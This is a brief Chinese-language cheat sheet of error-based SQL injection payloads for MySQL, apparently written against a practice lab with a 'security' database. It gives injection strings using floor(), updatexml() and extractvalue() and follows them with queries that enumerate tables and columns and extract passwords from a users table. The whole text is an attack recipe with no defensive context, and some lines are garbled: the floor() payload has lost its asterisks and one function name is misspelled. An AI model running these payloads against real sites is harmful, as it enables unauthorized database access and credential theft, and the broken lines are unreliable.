sql报错注入

1.报错函数

(1).floor()报错

语句：

?id=1‘ union select 1,count(),concat(payload,floor(rand(0)2))x from information_schema.columns group by x --+

(2).updatexml()报错

语句：

?id=1%27 and updatexml(1,concat(0x26,payload,0x26),1);---+

(3).exvalue()报错

?id=1′ and extractvalue(1,concat(0x26,database(),0x26));--+

• 注：这些函数都只能爆出32位字符

2.查询payload

1.查数据库：database()

2.查表（要加括号）：select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1

3.列：select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1

4.字段：select password from users limit 0,1